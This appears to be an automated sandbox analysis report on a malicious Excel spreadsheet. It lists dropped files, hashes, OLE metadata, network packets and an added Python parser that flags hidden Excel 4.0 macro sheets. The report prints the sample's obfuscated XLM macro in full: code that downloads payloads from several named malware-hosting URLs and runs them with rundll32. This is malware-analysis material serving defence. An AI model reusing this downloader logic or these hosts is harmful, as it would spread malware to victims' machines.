GUEROLA INDUSTRIES N#U00ba de cuenta.exe (malicious)
• 138.36.237.100
receipt145.htm (malicious)
• 138.36.237.100
xerox for hycite.htm (malicious)
• 138.36.237.100
SecuriteInfo.com.Heur.15528.xls (malicious)
• 138.36.237.100
Muligheds.exe (malicious)
• 138.36.237.100

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 1559
Entropy (8bit): 7.399832861783252
Encrypted: false
SSDEEP: 48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
MD5: ADAB5C4DF031FB9299F71ADA7E18F613
SHA1: 33E4E80807204C2B6182A3A14B591ACD25B5F0DB
SHA-256: 7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
SHA-512: 983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
Malicious: false
Reputation: moderate, very likely benign file
Preview: 0...0..........}[Q&.v...t...S..0...*.H........0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0...181102000000Z..301231235959Z0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Sectigo Limited1705..U....Sectigo RSA Domain Validation Secure Server CA0.."0...*.H.............0.........s3..< ....E..>..?.A.20.l.......-?.M......b..Hy...N..2%.....P?.L.@*.9.....2A.&.#z. ... .<.Do.u..@.2.....#>...o]Q.j.i.O.ri..Lm.....~......7x...4.V.X....d[.7..(h.V...\......$..0......z...B......J.....@..o.BJd..0.....'Z..X......c.oV...`4.t........_.........n0..j0...U.#..0...Sy.Z.+J.T.......f.0...U........^.T...w.......a.0...U...........0...U.......0.......0...U.%..0...+.........+.......0...U. ..0.0...U. .0...g.....0P..U...I0G0E.C.A.?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v..+........j0h0?..+.....0..3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%..+.....0.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 282
Entropy (8bit): 3.129725157113391
Encrypted: false
SSDEEP: 3:kkFklp7eykltfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ15z:kKms8jXxp9jKFlIaYM2+/LOjA/
MD5: 67FB835F22BC7093A5ECFD80F7BB68D7
SHA1: 83D1A30B13FE58549A6C20423F73D77E0EC32E39
SHA-256: 79E601F80A121E73B3417E207319969CF2DE8A037EE2B96CB1A2D9F88DA5B8DA
SHA-512: 2AEBD221A791B77343273ED6CE37EC00A7C57C9ED08F5D7F96260CF576E8321746E47770183DA227F5B6B8A155C5604B36D68BB97D72F9C079B4D0FD02FE1DC3
Malicious: false
Reputation: low
Preview: p...... ...........k....(....................................................... ........@u.>r..@8..................h.t.t.p.:././.c.r.t...s.e.c.t.i.g.o...c.o.m./.S.e.c.t.i.g.o.R.S.A.D.o.m.a.i.n.V.a.l.i.d.a.t.i.o.n.S.e.c.u.r.e.S.e.r.v.e.r.C.A...c.r.t...".5.b.d.b.9.3.8.0.-.6.1.7."...

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4C99B3FD-0FAA-455B-8960-C99FC42FE1C8
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 132891
Entropy (8bit): 5.375867383663069
Encrypted: false
SSDEEP: 1536:bcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:TcQ9DQW+z0XiK
MD5: 17626CC8CC2FA19C8480F81AA2D86C85
SHA1: D5D9C531001CA671D180743B31396D1905D9E88E
SHA-256: 234CA312A08DA031D6F85D916DE02DC4104B84050C0BBFE1EA11FDA806E796B8
SHA-512: 2A0F4B952BBD0DB18843644643D0055F1083CBDCD0580791DD61FA2CC56CC285DDCB13852327A275745DE428F4F9D69F541C6981E362AF72B82FA82A3718C25A
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-23T13:25:49">.. Build: 16.0.13822.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Temp\A8A40000
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 31494
                                                                                                                                                Entropy (8bit):7.641881919106936
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:A2Y9JPWEt4wFVfViKzV8aoVT0QNuzWKPqSFpBHRb7y3Tud3KyoqjNHs+q:J2hViKiW+u7qS7BHRbu3TukqRtq
                                                                                                                                                MD5:D7DBDDF0041076A4623D6AFE6B3D3190
                                                                                                                                                SHA1:08CA102A9D7587421DD767EF9CA0B2F75E2EEACA
                                                                                                                                                SHA-256:6865B0727ED18B3D59FE2FD3872101BD408175F7AB1B2CD7F3CF8189C2C34A33
                                                                                                                                                SHA-512:CD4ECC97DBF032171AABF362B5D123A7B04B67DCB22BCBAC2E67F832C4194C86032C2893FD0997B1C1F7EF6695D49F3CC768DA8B316975CDEBBB9F5B56C7B3F3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.N.0...?D......5e1.r....\.6..|....[.C.m.l.s..8.._-... ...eg.U.W.u-..p[_...pJ..eK@v59.1~X.....[..~q...+......|.".k.x.r.:...O..K.R.2....a&.M.n.4.r.\...T...<."..}B...."Qi..O.j?.i...GKf...... Y...c...(..B3..a....B.c......y.c..Z....F....1.......}.O..7.Ir4.kXH0M...BF........^..P*H..vv...d.j.J......P#....Ce.D|.L....\.........~..H.)."..O..o7.{....s......&..{...{..............9.a..k...:...a.D...."5.+.|J)P[.y9.'/.......PK..........!.......V.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-447781983-02182021.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:50 2020, mtime=Tue Feb 23 12:25:52 2021, atime=Tue Feb 23 12:25:52 2021, length=60928, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2290
                                                                                                                                                Entropy (8bit):4.676967723252077
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:8QjGGx/XPSH+GAAUbYT8DY7aB6myQjGGx/XPSH+GAAUbYT8DY7aB6m:8Qjx/XqnXUWQB6pQjx/XqnXUWQB6
                                                                                                                                                MD5:CDE505662EF3E97428636524621C4CC5
                                                                                                                                                SHA1:ADC9BA4474455E6CC78FB077C99B016C97EB2526
                                                                                                                                                SHA-256:C69D03931C69779E169414DD35CF57F7D3C5EA5F740C8ABB0DC8DC2B3334D39E
                                                                                                                                                SHA-512:46059481F45016EBA0FBE61C56F0C093C5FEFFF7B9BA9E7E2546B6309DB20A58FD01106B50B9A25CAA471DBB53CD43BF9E27F1F3EE49703EF503B1AE8A8AE348
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ...h..Q.....iXh.....iXh.................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR0k....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..WR0k....#J........................j.o.n.e.s.....~.1.....>Q|<..Desktop.h.......N..WR0k.....Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:..WR6k .COMPLA~1.XLS..r......>Qz<WR6k.....V........................C.o.m.p.l.a.i.n.t.-.4.4.7.7.8.1.9.8.3.-.0.2.1.8.2.0.2.1...x.l.s.......f...............-.......e...........>.S......C:\Users\user\Desktop\Complaint-447781983-02182021.xls..7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.4.4.7.7.8.1.9.8.3.-.0.2.1.8.2.0.2.1...x.l.s.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Feb 23 12:25:52 2021, atime=Tue Feb 23 12:25:52 2021, length=8192, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):904
                                                                                                                                                Entropy (8bit):4.654008658396181
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8McXUvJjduCH2POXAyDXOVs5Cm+WrjAZ/DYbDkLSeuSeL44t2Y+xIBjKZm:8Mx/XmV4CkAZbcDA7aB6m
                                                                                                                                                MD5:0909656D991462AF73F5D517D79FBAC5
                                                                                                                                                SHA1:166ED100EB72AFF58669562F97C2EF69EB19FC86
                                                                                                                                                SHA-256:3A3E9F1C9D5023143AE8E8B4913EE66F96FB0ADB1FF7410733BDA98DAA4596EE
                                                                                                                                                SHA-512:ED32D74B0D48F2E7EB8C64FCE2720EE9F261B31C3C5EB4DD6FBE980C2FDCABBBCE0078855DEB201BA42A6F51407DBADF256C4380021C0BDC3CD1CB4AAD02FE82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.............-..7.Nh....7.Nh..... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR0k....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..WR0k....#J........................j.o.n.e.s.....~.1.....WR;k..Desktop.h.......N..WR;k.....Y..............>.....J...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):137
                                                                                                                                                Entropy (8bit):4.791427181491947
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:oyBVomMYlIiSWcz0FXrl+1lIiSWcz0FXrlmMYlIiSWcz0FXrlv:dj6Yl4ubal4ubxYl4ub1
                                                                                                                                                MD5:733D335954A7C87A9071F01D9ACBE348
                                                                                                                                                SHA1:1AE168C09F0041C079663BCD4AB9162F33CD7623
                                                                                                                                                SHA-256:87A461F640E439196E55DB894090873D4B9F7FC9D895E4DCD13B2346165BA1B6
                                                                                                                                                SHA-512:04CB3D8787A8BA5A86F04E8162756D4A93DB3A2A8BDEB6E6128376E1EBF2978177B3B0A4986D3723DA6159C39765E5C0E76DE63097CD5A9289E37E1EC141A1E9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: Desktop.LNK=0..[xls]..Complaint-447781983-02182021.LNK=0..Complaint-447781983-02182021.LNK=0..[xls]..Complaint-447781983-02182021.LNK=0..
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22
                                                                                                                                                Entropy (8bit):2.9808259362290785
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                C:\Users\user\Desktop\59A40000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):111230
                                                                                                                                                Entropy (8bit):6.668853911800476
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:8s8rmOAIyyzElBIL6lECbgBGzP5xLm7TdK79nGzeNR69mGzeNRlDGzeNR6Gs8rma:F8rmOAIyyzElBIL6lECbgB+P5Nm7TdKn
                                                                                                                                                MD5:56AEACF20EEC43D6FE9469D4D54B1E77
                                                                                                                                                SHA1:BB1F142DA8765D0CF38B8097018C94BE82E94E83
                                                                                                                                                SHA-256:B2055DF49308485C5E6E8527498647782535556F2B107368264BE663D496AC3D
                                                                                                                                                SHA-512:74B62A889B58AED884F6F475DADDB160E449294EE71D9A4F5DDD6B79B645A0E40B3A50285E2D437FEF37F2D428329DE2B04C4AB8D56C156DC0964732D5B091E1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ........T8..........................\.p....pratesh B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1...,...8........q..C.a.l.i.b.r.i.1.......8........q..C.a.l.i.b.r.i.1.......8........q..C.a.l.i.b.r.i.1...h...8........q..C.a.m.b.r.i.a.1.......4........q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1.......>........8..C.a.l.i.b.r.i.1.......?........8..C.a.l.i.b.r.i.1.......4........8..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1.......<........8..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1.............

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:42:21 2021, Security: 0
                                                                                                                                                Entropy (8bit):3.697666945848156
                                                                                                                                                TrID:
                                                                                                                                                • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                File name:Complaint-447781983-02182021.xls
                                                                                                                                                File size:145920
                                                                                                                                                MD5:60f845a847e771a59b97d456c494f69d
                                                                                                                                                SHA1:bf79e4535e5d15cfbd4c6eb2fa2d086703ad81d6
                                                                                                                                                SHA256:c44df560766b2a3f60adba4ef6448e266a3036e19fc1631ae9ada22628447319
                                                                                                                                                SHA512:e942975e9b88c1e3783fa7723b8dcaf4cf1acc63e36380a56543ab96393815df27426169d38235790314de18590b0ed1363d38296e3b4a5543dba0f849f103e0
                                                                                                                                                SSDEEP:3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/V:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMU
                                                                                                                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OLE
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "Complaint-447781983-02182021.xls"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:True
                                                                                                                                                Application Name:Microsoft Excel
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True
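The indicators above are derived from the OLE stream names. The more useful static signal for this sample class lives inside the Workbook stream itself: the Globals substream contains one BoundSheet8 record per sheet, and that record carries both the sheet's visibility (visible, hidden, very hidden) and its type, where type 0x01 is an Excel 4.0 macro sheet. A macro sheet whose state is hidden or very hidden is the classic XLM lure. The parser below is an added example, not Joe Sandbox code and not taken from the sample; it walks raw BIFF8 records from a constructed Globals substream (embedded inline so it runs offline). In practice you would first extract the `Workbook` stream from the OLE container, for instance with `olefile`, which is assumed but not used here.

```python
import struct

# BIFF8 record identifiers relevant to sheet enumeration (MS-XLS)
BOF = 0x0809
EOF_RECORD = 0x000A
BOUNDSHEET = 0x0085

HS_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "Excel 4.0 macro sheet",
              0x02: "chart", 0x06: "VBA module"}


def iter_records(stream):
    """Yield (record_type, payload) for each BIFF record in a Workbook stream."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        payload = stream[off + 4:off + 4 + rlen]
        if len(payload) < rlen:
            raise ValueError(f"truncated record 0x{rtype:04x} at offset {off}")
        yield rtype, payload
        off += 4 + rlen


def parse_boundsheets(workbook_stream):
    """Return the sheet table from the Globals substream: name, visibility, type, offset."""
    sheets = []
    for rtype, payload in iter_records(workbook_stream):
        if rtype == EOF_RECORD:
            break          # end of Globals substream; later records belong to sheets
        if rtype != BOUNDSHEET:
            continue
        # BoundSheet8: lbPlyPos (4), grbit (2: bits 0-1 hsState, bits 8-15 dt),
        # then a ShortXLUnicodeString: cch (1), flags (1, bit 0 = UTF-16LE), chars
        ply_pos, grbit, cch, flags = struct.unpack_from("<IHBB", payload, 0)
        if flags & 0x01:
            name = payload[8:8 + 2 * cch].decode("utf-16-le")
        else:
            name = payload[8:8 + cch].decode("latin-1")
        dt = (grbit >> 8) & 0xFF
        sheets.append({
            "name": name,
            "state": HS_STATE.get(grbit & 0x03, f"unknown({grbit & 0x03})"),
            "type": SHEET_TYPE.get(dt, f"unknown(0x{dt:02x})"),
            "offset": ply_pos,
        })
    return sheets


def triage(sheets):
    """Flag Excel 4.0 macro sheets; a hidden or very hidden one is rated high."""
    findings = []
    for s in sheets:
        if s["type"] != "Excel 4.0 macro sheet":
            continue
        severity = "high" if s["state"] != "visible" else "medium"
        findings.append((s["name"], s["state"], severity))
    return findings


def _record(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload


def _boundsheet(name, hs_state, dt, ply_pos):
    try:
        raw, high = name.encode("latin-1"), 0
    except UnicodeEncodeError:
        raw, high = name.encode("utf-16-le"), 1
    grbit = (dt << 8) | hs_state
    return _record(BOUNDSHEET, struct.pack("<IHBB", ply_pos, grbit, len(name), high) + raw)


# Constructed Globals substream (not taken from the sample): one visible worksheet,
# one very hidden XLM macro sheet, one hidden macro sheet with a Cyrillic name.
SAMPLE_WORKBOOK = (
    _record(BOF, bytes(16))
    + _boundsheet("Sheet1", 0, 0x00, 0x0800)
    + _boundsheet("Macro1", 2, 0x01, 0x1200)
    + _boundsheet("Лист3", 1, 0x01, 0x1800)
    + _record(EOF_RECORD, b"")
    + _record(BOF, bytes(16))   # first sheet substream would start here
)

if __name__ == "__main__":
    for name, state, sev in triage(parse_boundsheets(SAMPLE_WORKBOOK)):
        print(f"{sev:6} {state:12} {name}")
```

The parser deliberately stops at the first EOF record: BoundSheet8 records only occur in the Globals substream, and reading on into the sheet substreams would only add noise. The `offset` field is the absolute position of each sheet's own BOF in the stream, which is where you would continue to pull the FORMULA records of a flagged macro sheet.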

                                                                                                                                                Summary

                                                                                                                                                Code Page:1251
                                                                                                                                                Author:
                                                                                                                                                Last Saved By:Friner
                                                                                                                                                Create Time:2006-09-16 00:00:00
                                                                                                                                                Last Saved Time:2021-02-18 13:42:21
                                                                                                                                                Creating Application:Microsoft Excel
Security:0

Document Summary

Document Code Page:1251
Thumbnail Scaling Desired:False
Contains Dirty Links:False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:4096
Entropy:0.321292606979
Base64 Encoded:False
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:4096
Entropy:0.2746714277
Base64 Encoded:False
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085
General
Stream Path:Book
File Type:Applesoft BASIC program data, first line number 8
Stream Size:135085
Entropy:3.69042254796
Base64 Encoded:True

Macro 4.0 Code

                                                                                                                                                ,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
                                                                                                                                                ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

                                                                                                                                                Feb 23, 2021 14:26:03.284308910 CET804974372.52.227.180192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:29.570221901 CET8049732162.241.80.6192.168.2.4
                                                                                                                                                Feb 23, 2021 14:26:31.756675959 CET8049734138.36.237.100192.168.2.4
                                                                                                                                                Feb 23, 2021 14:27:02.912409067 CET804973891.199.212.52192.168.2.4
                                                                                                                                                Feb 23, 2021 14:27:02.912514925 CET4973880192.168.2.491.199.212.52
                                                                                                                                                Feb 23, 2021 14:27:02.912652969 CET4973880192.168.2.491.199.212.52
                                                                                                                                                Feb 23, 2021 14:27:02.973691940 CET804973891.199.212.52192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2021 14:25:35.948244095 CET | 53723 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:35.997133017 CET | 53 | 53723 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:36.241441965 CET | 64646 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:36.290787935 CET | 53 | 64646 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:36.497275114 CET | 65298 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:36.546272039 CET | 53 | 65298 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:39.484381914 CET | 59123 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:39.543113947 CET | 53 | 59123 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:39.807583094 CET | 54531 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:39.858936071 CET | 53 | 54531 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:41.176209927 CET | 49714 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:41.225099087 CET | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:42.647861004 CET | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:42.696520090 CET | 53 | 58028 | 8.8.8.8 | 192.168.2.4
